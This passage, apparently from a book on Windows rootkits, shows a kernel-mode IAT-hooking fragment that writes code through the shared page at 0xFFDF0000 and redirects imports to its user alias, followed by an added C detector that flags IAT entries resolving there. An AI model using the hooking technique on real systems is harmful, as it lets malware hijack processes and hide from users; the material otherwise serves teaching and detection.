// Write the raw opcodes to memory,
// using a kernel address that is mapped
// into the address space of all processes
// (thanks to Barnaby Jack)
RtlCopyMemory((PVOID)d_sharedK, new_code, 8);
gb_Hooked = TRUE;
// Point the IAT entry at the user-mode address of the "new function"
*MappedImTable = d_sharedM;

The kernel address, 0xFFDF0000, and the user address, 0x7FFE0000, both map to the same physical page. The mapping at the kernel address is writable, but the mapping at the user address is not. Your rootkit can write code through the kernel address and reference it by the user address in the IAT hook.
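
Because the hook leaves an IAT entry pointing into the shared page at 0x7FFE0000, a detector can flag any import that resolves there or outside every loaded module. The following is an added example, not code from the original text: the type and function names are hypothetical, the module ranges and IAT values are constructed sample data, and a single 4 KB x86 page is assumed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define SHARED_USER_BASE 0x7FFE0000u /* user-mode alias named in the text */
#define SHARED_PAGE_SIZE 0x1000u     /* assumption: one 4 KB x86 page */

typedef struct { uint32_t base, size; } module_range; /* hypothetical type */
enum iat_verdict { IAT_OK, IAT_OUTSIDE_MODULES, IAT_SHARED_PAGE };

/* Constructed sample data: two loaded-module ranges and four IAT slots. */
static const module_range sample_mods[] = {
    { 0x7C800000u, 0x000F6000u }, { 0x77DD0000u, 0x0009B000u } };
static const uint32_t sample_iat[] = {
    0x7C801D7Bu, 0x7FFE0800u, 0x77DD6FEFu, 0x00A30000u };

static int in_range(uint32_t addr, uint32_t base, uint32_t size) {
    return addr >= base && addr - base < size;
}

/* An import should resolve inside a loaded module. A target in the shared
   page is reported separately, since no import is expected to resolve there. */
enum iat_verdict classify_iat_entry(uint32_t target,
                                    const module_range *mods, size_t n_mods) {
    if (in_range(target, SHARED_USER_BASE, SHARED_PAGE_SIZE))
        return IAT_SHARED_PAGE;
    for (size_t i = 0; i < n_mods; i++)
        if (in_range(target, mods[i].base, mods[i].size))
            return IAT_OK;
    return IAT_OUTSIDE_MODULES;
}

/* Walk a snapshot of IAT slots, report each suspicious one, return the count. */
size_t count_suspicious(const uint32_t *iat, size_t n_iat,
                        const module_range *mods, size_t n_mods) {
    size_t hits = 0;
    for (size_t i = 0; i < n_iat; i++) {
        enum iat_verdict v = classify_iat_entry(iat[i], mods, n_mods);
        if (v == IAT_OK) continue;
        printf("slot %u -> 0x%08X: %s\n", (unsigned)i, (unsigned)iat[i],
               v == IAT_SHARED_PAGE ? "shared user page" : "outside all modules");
        hits++;
    }
    return hits;
}

int main(void) {
    return count_suspicious(sample_iat, 4, sample_mods, 2) == 2 ? 0 : 1;
}
```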